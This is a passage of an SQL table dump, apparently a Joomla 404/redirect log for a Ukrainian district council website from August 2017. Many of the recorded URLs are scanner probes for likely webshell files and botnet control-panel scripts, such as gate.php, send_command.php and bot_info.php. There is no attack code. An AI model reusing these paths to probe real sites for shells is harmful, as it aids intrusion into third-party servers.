00:00:00',301),(30933,'http://www.malyn-rayrada.gov.ua/modules/mod_system/mod_system.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_system/mod_system.php','',1,0,'2017-08-05 02:27:33','0000-00-00 00:00:00',301),(30934,'http://malyn-rayrada.gov.ua/modules/mod_ariimagesws/mod_ariimagesws.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_ariimagesws/mod_ariimagesws.php','',1,0,'2017-08-05 04:50:01','0000-00-00 00:00:00',301),(30935,'http://www.malyn-rayrada.gov.ua/modules/mod_servises/system.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_servises/system.php','',1,0,'2017-08-07 04:59:20','0000-00-00 00:00:00',301),(30936,'http://malyn-rayrada.gov.ua/modules/mod_servises/system.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_servises/system.php','',1,0,'2017-08-07 09:36:37','0000-00-00 00:00:00',301),(30937,'http://www.malyn-rayrada.gov.ua/images/jmails.php?u',NULL,'http://www.malyn-rayrada.gov.ua/images/jmails.php?u','',1,0,'2017-08-07 16:23:45','0000-00-00 00:00:00',301),(30938,'http://malyn-rayrada.gov.ua/images/jmails.php?u',NULL,'http://malyn-rayrada.gov.ua/images/jmails.php?u','',1,0,'2017-08-07 21:41:43','0000-00-00 00:00:00',301),(30939,'http://malyn-rayrada.gov.ua/forum/',NULL,'http://malyn-rayrada.gov.ua/','',1,0,'2017-08-08 00:07:20','0000-00-00 00:00:00',301),(30940,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1792-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2017-rik',NULL,'','',31,0,'2017-08-09 18:19:26','0000-00-00 00:00:00',301),(30941,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1792-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2017-rik',NULL,'','',15,0,'2017-08-09 20:59:52','0000-00-00 00:00:00',301),(30942,'http://malyn-rayrada.gov.ua/attachments/article/1788/ñ€ðµð¹ñ‚ð¸ð½ð³ ð¿ðµñ€ñˆðµ ð¿ñ–ð²ñ€ñ–ñ‡ñ‡ñ  2017.pdf',NULL,'','',2,0,'2017-08-10 16:34:16','0000-00-00 00:00:00',301),(30943,'http://malyn-rayrada.gov.ua/e793dbc2-fd41-4982-b55d-660dd4e8cd72',NULL,'','',1,0,'2017-08-11 06:57:21','0000-00-00 00:00:00',301),(30944,'http://malyn-rayrada.gov.ua/attachments/article/1784/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2017-08-11 18:30:20','0000-00-00 00:00:00',301),(30945,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/2010-06-05-13-46-4',NULL,'','',1,0,'2017-08-11 23:30:55','0000-00-00 00:00:00',301),(30946,'http://www.malyn-rayrada.gov.ua/modules/mod_socialpinboard_menu/index.html',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_socialpinboard_menu/index.html','',1,0,'2017-08-16 08:11:36','0000-00-00 00:00:00',301),(30947,'http://malyn-rayrada.gov.ua/attachments/article/1795/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2017-08-16 19:16:48','0000-00-00 00:00:00',301),(30948,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/theme/style.css',NULL,'','',2,0,'2017-08-20 14:23:46','0000-00-00 00:00:00',301),(30949,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/config.php',NULL,'','',6,0,'2017-08-20 14:23:50','0000-00-00 00:00:00',301),(30950,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/style_dark.css',NULL,'','',2,0,'2017-08-20 14:23:51','0000-00-00 00:00:00',301),(30951,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/admin.php',NULL,'','',6,0,'2017-08-20 14:23:51','0000-00-00 00:00:00',301),(30952,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/include/config.php',NULL,'','',1,0,'2017-08-20 14:23:54','0000-00-00 00:00:00',301),(30953,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/css/',NULL,'','',4,0,'2017-08-20 14:23:55','0000-00-00 00:00:00',301),(30954,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/css/content.css',NULL,'','',1,0,'2017-08-20 14:23:56','0000-00-00 00:00:00',301),(30955,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/css/reset.css',NULL,'','',1,0,'2017-08-20 14:23:56','0000-00-00 00:00:00',301),(30956,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/',NULL,'','',1,0,'2017-08-20 14:23:57','0000-00-00 00:00:00',301),(30957,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/gear.png',NULL,'','',1,0,'2017-08-20 14:24:01','0000-00-00 00:00:00',301),(30958,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/header.png',NULL,'','',1,0,'2017-08-20 14:24:03','0000-00-00 00:00:00',301),(30959,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/user_female.png',NULL,'','',1,0,'2017-08-20 14:24:04','0000-00-00 00:00:00',301),(30960,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/arrow_left_ovr.png',NULL,'','',1,0,'2017-08-20 14:24:07','0000-00-00 00:00:00',301),(30961,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/bck_attention.png',NULL,'','',1,0,'2017-08-20 14:24:08','0000-00-00 00:00:00',301),(30962,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/login.php',NULL,'','',14,0,'2017-08-20 14:24:23','0000-00-00 00:00:00',301),(30963,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/home.php',NULL,'','',1,0,'2017-08-20 14:24:30','0000-00-00 00:00:00',301),(30964,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/index.html',NULL,'','',2,0,'2017-08-20 14:24:31','0000-00-00 00:00:00',301),(30965,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/graphics/banner.png',NULL,'','',1,0,'2017-08-20 14:24:31','0000-00-00 00:00:00',301),(30966,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/login.js',NULL,'','',1,0,'2017-08-20 14:24:34','0000-00-00 00:00:00',301),(30967,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/project.php',NULL,'','',1,0,'2017-08-20 14:24:49','0000-00-00 00:00:00',301),(30968,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/lend.php',NULL,'','',2,0,'2017-08-20 14:24:52','0000-00-00 00:00:00',301),(30969,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/lending/index.php',NULL,'','',5,0,'2017-08-20 14:24:52','0000-00-00 00:00:00',301),(30970,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/asdfdsfasfdasfsd.php',NULL,'','',1,0,'2017-08-20 14:24:53','0000-00-00 00:00:00',301),(30971,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/anal.php',NULL,'','',1,0,'2017-08-20 14:24:54','0000-00-00 00:00:00',301),(30972,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/biling.php',NULL,'','',1,0,'2017-08-20 14:24:55','0000-00-00 00:00:00',301),(30973,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/logout.php',NULL,'','',3,0,'2017-08-20 14:24:55','0000-00-00 00:00:00',301),(30974,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/change.php',NULL,'','',1,0,'2017-08-20 14:24:57','0000-00-00 00:00:00',301),(30975,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/statss.php',NULL,'','',1,0,'2017-08-20 14:24:58','0000-00-00 00:00:00',301),(30976,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/btn_submit.png',NULL,'','',3,0,'2017-08-20 14:25:01','0000-00-00 00:00:00',301),(30977,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/support.php',NULL,'','',2,0,'2017-08-20 14:25:25','0000-00-00 00:00:00',301),(30978,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/lending/img/arab.png',NULL,'','',3,0,'2017-08-20 14:25:26','0000-00-00 00:00:00',301),(30979,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/icn_edit.png',NULL,'','',3,0,'2017-08-20 14:25:27','0000-00-00 00:00:00',301),(30980,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/js/hideshow.js',NULL,'','',2,0,'2017-08-20 14:25:28','0000-00-00 00:00:00',301),(30981,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/lending/img/fbi.png',NULL,'','',1,0,'2017-08-20 14:25:39','0000-00-00 00:00:00',301),(30982,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/icn_search.png',NULL,'','',1,0,'2017-08-20 14:25:39','0000-00-00 00:00:00',301),(30983,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/breadcrumb_divider.png',NULL,'','',1,0,'2017-08-20 14:25:39','0000-00-00 00:00:00',301),(30984,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/resources/images/b.png',NULL,'','',1,0,'2017-08-20 14:25:40','0000-00-00 00:00:00',301),(30985,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/cron.php',NULL,'','',1,0,'2017-08-20 14:26:02','0000-00-00 00:00:00',301),(30986,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/tasks.php',NULL,'','',4,0,'2017-08-20 14:26:08','0000-00-00 00:00:00',301),(30987,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/stats.php',NULL,'','',1,0,'2017-08-20 14:26:16','0000-00-00 00:00:00',301),(30988,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/run.php',NULL,'','',1,0,'2017-08-20 14:26:25','0000-00-00 00:00:00',301),(30989,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/asdfddsas.php',NULL,'','',1,0,'2017-08-20 14:26:25','0000-00-00 00:00:00',301),(30990,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/view/img/favicon.png',NULL,'','',1,0,'2017-08-20 14:26:28','0000-00-00 00:00:00',301),(30991,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/tmp',NULL,'','',1,0,'2017-08-20 14:26:29','0000-00-00 00:00:00',301),(30992,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/tmp/',NULL,'','',1,0,'2017-08-20 14:26:31','0000-00-00 00:00:00',301),(30993,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/vendor',NULL,'','',1,0,'2017-08-20 14:26:31','0000-00-00 00:00:00',301),(30994,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/vendor/',NULL,'','',1,0,'2017-08-20 14:26:33','0000-00-00 00:00:00',301),(30995,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/lib',NULL,'','',1,0,'2017-08-20 14:26:34','0000-00-00 00:00:00',301),(30996,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/lib/',NULL,'','',1,0,'2017-08-20 14:26:35','0000-00-00 00:00:00',301),(30997,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/app',NULL,'','',1,0,'2017-08-20 14:26:37','0000-00-00 00:00:00',301),(30998,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/app/',NULL,'','',1,0,'2017-08-20 14:26:37','0000-00-00 00:00:00',301),(30999,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/tmp/logs',NULL,'','',1,0,'2017-08-20 14:26:38','0000-00-00 00:00:00',301),(31000,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/tmp/logs/',NULL,'','',1,0,'2017-08-20 14:26:39','0000-00-00 00:00:00',301),(31001,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/uploads',NULL,'','',1,0,'2017-08-20 14:26:40','0000-00-00 00:00:00',301),(31002,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/uploads/',NULL,'','',1,0,'2017-08-20 14:26:41','0000-00-00 00:00:00',301),(31003,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/public',NULL,'','',1,0,'2017-08-20 14:26:41','0000-00-00 00:00:00',301),(31004,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/public/',NULL,'','',1,0,'2017-08-20 14:26:43','0000-00-00 00:00:00',301),(31005,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/public/css/app.css',NULL,'','',1,0,'2017-08-20 14:26:43','0000-00-00 00:00:00',301),(31006,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/api.php',NULL,'','',1,0,'2017-08-20 14:27:38','0000-00-00 00:00:00',301),(31007,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/data/login.css',NULL,'','',1,0,'2017-08-20 14:27:38','0000-00-00 00:00:00',301),(31008,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/asfdfa.php',NULL,'','',1,0,'2017-08-20 14:27:42','0000-00-00 00:00:00',301),(31009,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/include/login.php',NULL,'','',1,0,'2017-08-20 14:27:43','0000-00-00 00:00:00',301),(31010,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/include/chart.php',NULL,'','',1,0,'2017-08-20 14:27:43','0000-00-00 00:00:00',301),(31011,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/include/activecmd.php',NULL,'','',1,0,'2017-08-20 14:27:43','0000-00-00 00:00:00',301),(31012,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/include/function.php',NULL,'','',1,0,'2017-08-20 14:27:44','0000-00-00 00:00:00',301),(31013,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/main.css',NULL,'','',1,0,'2017-08-20 14:27:44','0000-00-00 00:00:00',301),(31014,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/bar.png',NULL,'','',1,0,'2017-08-20 14:27:44','0000-00-00 00:00:00',301),(31015,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/cp.php',NULL,'','',2,0,'2017-08-20 14:27:46','0000-00-00 00:00:00',301),(31016,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/theme/images/back-all.jpg',NULL,'','',1,0,'2017-08-20 14:27:47','0000-00-00 00:00:00',301),(31017,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/theme/header.html',NULL,'','',2,0,'2017-08-20 14:27:48','0000-00-00 00:00:00',301),(31018,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/asdfdsafdsfsadf.php',NULL,'','',1,0,'2017-08-20 14:27:50','0000-00-00 00:00:00',301),(31019,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/security_number.php',NULL,'','',2,0,'2017-08-20 14:27:50','0000-00-00 00:00:00',301),(31020,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/connect.php',NULL,'','',2,0,'2017-08-20 14:27:53','0000-00-00 00:00:00',301),(31021,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/inc/',NULL,'','',2,0,'2017-08-20 14:27:57','0000-00-00 00:00:00',301),(31022,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/ico/',NULL,'','',2,0,'2017-08-20 14:28:04','0000-00-00 00:00:00',301),(31023,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/png/',NULL,'','',2,0,'2017-08-20 14:28:06','0000-00-00 00:00:00',301),(31024,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/preloaders/',NULL,'','',2,0,'2017-08-20 14:28:09','0000-00-00 00:00:00',301),(31025,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/back.css',NULL,'','',1,0,'2017-08-20 14:28:11','0000-00-00 00:00:00',301),(31026,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/img/favicon.png',NULL,'','',1,0,'2017-08-20 14:28:16','0000-00-00 00:00:00',301),(31027,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/img/logo.png',NULL,'','',5,0,'2017-08-20 14:28:17','0000-00-00 00:00:00',301),(31028,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/management.php',NULL,'','',2,0,'2017-08-20 14:28:18','0000-00-00 00:00:00',301),(31029,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/css/vectormap.css',NULL,'','',2,0,'2017-08-20 14:28:19','0000-00-00 00:00:00',301),(31030,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/js/manag.js',NULL,'','',2,0,'2017-08-20 14:28:22','0000-00-00 00:00:00',301),(31031,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/js/tasks.js',NULL,'','',2,0,'2017-08-20 14:28:24','0000-00-00 00:00:00',301),(31032,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/img/',NULL,'','',4,0,'2017-08-20 14:28:28','0000-00-00 00:00:00',301),(31033,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/statistics.php',NULL,'','',3,0,'2017-08-20 14:28:29','0000-00-00 00:00:00',301),(31034,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/icon1.png',NULL,'','',1,0,'2017-08-20 14:28:32','0000-00-00 00:00:00',301),(31035,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/icon3.png',NULL,'','',1,0,'2017-08-20 14:28:33','0000-00-00 00:00:00',301),(31036,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/header.jpg',NULL,'','',1,0,'2017-08-20 14:28:33','0000-00-00 00:00:00',301),(31037,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/main.php',NULL,'','',3,0,'2017-08-20 14:28:42','0000-00-00 00:00:00',301),(31038,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/submit.php',NULL,'','',1,0,'2017-08-20 14:28:43','0000-00-00 00:00:00',301),(31039,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/style.css',NULL,'','',1,0,'2017-08-20 14:28:49','0000-00-00 00:00:00',301),(31040,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/includes/design/images/favicon.ico',NULL,'','',1,0,'2017-08-20 14:28:49','0000-00-00 00:00:00',301),(31041,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/assets/img/favicon.ico',NULL,'','',1,0,'2017-08-20 14:28:59','0000-00-00 00:00:00',301),(31042,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/order.php',NULL,'','',1,0,'2017-08-20 14:29:15','0000-00-00 00:00:00',301),(31043,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/captcha.php',NULL,'','',1,0,'2017-08-20 14:29:19','0000-00-00 00:00:00',301),(31044,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/gdx/gdx.php',NULL,'','',1,0,'2017-08-20 14:29:20','0000-00-00 00:00:00',301),(31045,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/gdx/itnernal.php',NULL,'','',1,0,'2017-08-20 14:29:23','0000-00-00 00:00:00',301),(31046,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/flags/ag.png',NULL,'','',1,0,'2017-08-20 14:29:23','0000-00-00 00:00:00',301),(31047,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/includes/bot_info.php',NULL,'','',1,0,'2017-08-20 14:29:34','0000-00-00 00:00:00',301),(31048,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/includes/hexdecode.php',NULL,'','',1,0,'2017-08-20 14:29:35','0000-00-00 00:00:00',301),(31049,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/includes/stats.php',NULL,'','',1,0,'2017-08-20 14:29:36','0000-00-00 00:00:00',301),(31050,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/delete.png',NULL,'','',1,0,'2017-08-20 14:29:39','0000-00-00 00:00:00',301),(31051,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/info.png',NULL,'','',1,0,'2017-08-20 14:29:41','0000-00-00 00:00:00',301),(31052,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/includes/delete_command.php',NULL,'','',1,0,'2017-08-20 14:29:42','0000-00-00 00:00:00',301),(31053,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/includes/send_command.php',NULL,'','',1,0,'2017-08-20 14:29:43','0000-00-00 00:00:00',301),(31054,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/theme/images/back-all.png',NULL,'','',1,0,'2017-08-20 14:29:44','0000-00-00 00:00:00',301),(31055,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/themes/bootstrap.css',NULL,'','',1,0,'2017-08-20 14:29:53','0000-00-00 00:00:00',301),(31056,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/phpinfo.php',NULL,'','',1,0,'2017-08-20 14:29:57','0000-00-00 00:00:00',301),(31057,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/fre.php',NULL,'','',1,0,'2017-08-20 14:30:29','0000-00-00 00:00:00',301),(31058,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/adsfdsafas.php',NULL,'','',1,0,'2017-08-20 14:30:30','0000-00-00 00:00:00',301),(31059,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/css',NULL,'','',3,0,'2017-08-20 14:31:02','0000-00-00 00:00:00',301),(31060,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/files',NULL,'','',2,0,'2017-08-20 14:31:03','0000-00-00 00:00:00',301),(31061,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/img/back',NULL,'','',1,0,'2017-08-20 14:31:03','0000-00-00 00:00:00',301),(31062,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/img/flags',NULL,'','',2,0,'2017-08-20 14:31:05','0000-00-00 00:00:00',301),(31063,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/img/softs',NULL,'','',2,0,'2017-08-20 14:31:07','0000-00-00 00:00:00',301),(31064,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/img/back/hawk-clip-art-hawk03.gif',NULL,'','',2,0,'2017-08-20 14:31:07','0000-00-00 00:00:00',301),(31065,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/ img/back',NULL,'','',1,0,'2017-08-20 14:31:20','0000-00-00 00:00:00',301),(31066,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/login/index.php',NULL,'','',2,0,'2017-08-20 14:31:36','0000-00-00 00:00:00',301),(31067,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/include/',NULL,'','',1,0,'2017-08-20 14:31:39','0000-00-00 00:00:00',301),(31068,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/js/main.js',NULL,'','',1,0,'2017-08-20 14:31:40','0000-00-00 00:00:00',301),(31069,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/asfdasfasdfasdf.php',NULL,'','',1,0,'2017-08-20 14:31:43','0000-00-00 00:00:00',301),(31070,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/configuration.php',NULL,'','',2,0,'2017-08-20 14:31:44','0000-00-00 00:00:00',301),(31071,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/page.php',NULL,'','',1,0,'2017-08-20 14:31:47','0000-00-00 00:00:00',301),(31072,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/include/inc_botlist.php',NULL,'','',1,0,'2017-08-20 14:31:48','0000-00-00 00:00:00',301),(31073,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/include/inc_commands.php',NULL,'','',1,0,'2017-08-20 14:31:49','0000-00-00 00:00:00',301),(31074,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/include/tpl_commands-php',NULL,'','',1,0,'2017-08-20 14:31:49','0000-00-00 00:00:00',301),(31075,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/include/tpl_main.php',NULL,'','',1,0,'2017-08-20 14:31:52','0000-00-00 00:00:00',301),(31076,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/securimage/backgrounds',NULL,'','',1,0,'2017-08-20 14:31:53','0000-00-00 00:00:00',301),(31077,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/styles/main.css',NULL,'','',1,0,'2017-08-20 14:31:54','0000-00-00 00:00:00',301),(31078,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/styles/reset.css',NULL,'','',1,0,'2017-08-20 14:31:57','0000-00-00 00:00:00',301),(31079,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/images/favicon.ico',NULL,'','',1,0,'2017-08-20 14:32:00','0000-00-00 00:00:00',301),(31080,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/gate.php?request=true',NULL,'','',1,0,'2017-08-20 14:32:06','0000-00-00 00:00:00',301),(31081,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/bots.php',NULL,'','',1,0,'2017-08-20 14:32:12','0000-00-00 00:00:00',301),(31082,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/edituser.php',NULL,'','',1,0,'2017-08-20 14:32:13','0000-00-00 00:00:00',301),(31083,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/main.php',NULL,'','',1,0,'2017-08-20 14:32:15','0000-00-00 00:00:00',301),(31084,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/tasks.php',NULL,'','',1,0,'2017-08-20 14:32:16','0000-00-00 00:00:00',301),(31085,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/users.php',NULL,'','',1,0,'2017-08-20 14:32:17','0000-00-00 00:00:00',301),(31086,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/logs.php',NULL,'','',1,0,'2017-08-20 14:32:17','0000-00-00 00:00:00',301),(31087,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/account.php',NULL,'','',1,0,'2017-08-20 14:32:17','0000-00-00 00:00:00',301),(31088,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/settings.php',NULL,'','',1,0,'2017-08-20 14:32:18','0000-00-00 00:00:00',301),(31089,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/details.php',NULL,'','',1,0,'2017-08-20 14:32:18','0000-00-00 00:00:00',301),(31090,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/logout.php',NULL,'','',1,0,'2017-08-20 14:32:18','0000-00-00 00:00:00',301),(31091,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/help.php',NULL,'','',1,0,'2017-08-20 14:32:19','0000-00-00 00:00:00',301),(31092,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/ufr.php',NULL,'','',1,0,'2017-08-20 14:32:22','0000-00-00 00:00:00',301),(31093,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/login.php',NULL,'','',1,0,'2017-08-20 14:32:27','0000-00-00 00:00:00',301),(31094,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/android/admin.php',NULL,'','',1,0,'2017-08-20 14:32:33','0000-00-00 00:00:00',301),(31095,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/img',NULL,'','',3,0,'2017-08-20 14:32:44','0000-00-00 00:00:00',301),(31096,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/img/banners',NULL,'','',2,0,'2017-08-20 14:32:45','0000-00-00 00:00:00',301),(31097,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/afdsafsdaf.php',NULL,'','',1,0,'2017-08-20 14:32:53','0000-00-00 